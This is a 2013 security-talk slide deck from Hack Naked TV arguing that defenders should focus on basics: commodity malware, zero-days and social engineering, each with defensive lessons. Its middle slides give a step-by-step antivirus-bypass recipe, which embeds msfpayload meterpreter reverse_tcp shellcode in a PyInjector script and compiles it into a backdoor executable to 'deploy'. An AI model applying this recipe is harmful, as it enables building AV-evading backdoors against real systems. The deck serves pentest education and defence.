http://hacknaked.tv Copyright 2013
The Need for Focus
• It is easy to get caught up in the latest “Hack of the day”
• Let’s talk about
• iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
#1 Crappy Malware
• Had enough presentations on the “Not so advanced persistent threat?”
• Somehow, the belief is that if we can make fun of the attackers’ skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..
About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337 or even 31337
Just right
AV Bypass Made Easy
• Many of these tools have options to export to a raw string of hex characters
• In fact, that does not even matter
• We can use Ghost Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies: Why I pentest
Python Injection
• Another technique is to:
• Convert your payload into Raw output
• Import the Raw output into a python script
• Convert the Python script into an executable
• It all works because the text sections of an .exe are not being reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass
Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python: http://www.python.org/
• Add Python to system PATH
• Install PyWin32: http://sourceforge.net/projects/pywin32/
• Install PyInstaller: http://www.pyinstaller.org/
• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip
Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any machine)
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>'
• where: <msfpayload output> = output from the above msfpayload command
Windows AV Bypass - Compile
• While in the PyInstaller Directory:
• python utils\Makespec.py --onefile --noconsole pyinjector.py
• python utils\Build.py pyinjector/pyinjector.spec
• New backdoor should be under:
• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
#2 0-day du Jour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?
Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as they need to be
• Which is not very advanced
Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
• Get away from Black List Security
• Now
• Right now
• … I mean after this presentation
#3 Users Making “Mistakes”
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky
We are all Dumb
• Or, the pretexts for the attackers are getting really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of coverage
• LinkedIn merit badges
• If the attack is tailored, it is successful
Hail Pentest Geek!
http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/
Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good
Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on attacker actions
• Limit the damage the user can do
• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human
Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We lose sight of that in this industry
OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013
End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2